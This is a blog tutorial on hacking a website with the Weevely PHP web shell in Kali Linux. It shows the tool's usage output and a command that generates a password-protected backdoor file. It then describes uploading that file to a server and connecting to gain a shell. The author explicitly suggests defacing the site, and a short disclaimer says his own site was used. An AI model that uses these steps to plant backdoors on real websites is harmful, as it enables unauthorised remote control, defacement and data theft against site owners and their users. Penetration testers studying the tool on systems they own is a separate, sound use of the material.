Kali Linux

How To Hack Website Using Weevely In kali Linux 2018.1

weevely
Written by Mubassir patel

Hello, Friends. I am Patel Mubassir. Today we are going to learn how to Hack website using weevely in Kali Linux 2018.1. Before starting anything let me introduce to weevely.

What is Weevely?

Weevely is a web shell designed for remote server administration and penetration testing that can be extended over the network at runtime with more than 30 modules.

It executes remote code via an obfuscated PHP agent located on the compromised HTTP server. It fits both web administration and penetration testing post-exploitation scenarios to maintain access, provide situational awareness, escalate the privileges, and move laterally in the network.

How To Install Weevely In Kali Linux 2018.1?

Generally, Weevely preinstalled in Kali Linux. You just simply enter the weevely command in Terminal. You will see something like below Terminal Picture. Or You can Git Clone from Here.

weevely

Usage:

root@D4rk5h4d0w:~# weevely

[+] weevely 3.2.0
[!] Error: too few arguments

[+] Run terminal to the target
 weevely <URL> <password> [cmd]

[+] Load session file
 weevely session <path> [cmd]

[+] Generate backdoor agent
 weevely generate <password> <path>

First, we have to generate a PHP backdoor using commands. Let’s Generate a PHP Backdoor with password Protected.  As we can see PHP backdoor Shell generate with Password  12345.

Read This: Top 10 Wifi Hacking Tools in 2018

weevely

root@D4rk5h4d0w:~# weevely generate 12345 /root/Desktop/phpShell.php
Generated backdoor with password '12345' in '/root/Desktop/phpShell.php' of 1459 byte size.

Now, We have to upload this shell on the website. I have my own website, so I am going to upload this shell on my website.  Okay, I already uploaded shell on my website. Let’s Try to connect using weevely. Now, In this Step, we have to just pass the PHP shell URL and Shell Password.

weevelyweevely

That’s All. Now, we got the Shell. Now, you can do anything with this fucking site even You can simply Deface this site :). That was mine site on which was uploaded the shell.  You can Watch the video for better understand.

Note: This is only for demonstration purpose. And I had used my own website for demonstration.

Read This: Th3inspector: Best Tool for Information gathering

Video:

About the author

Mubassir patel

Mubassir is a founder and developer of this site. He is a computer science engineer. He has a very deep interest in ethical hacking, penetration testing, website development and including all technology topic.

Leave a Comment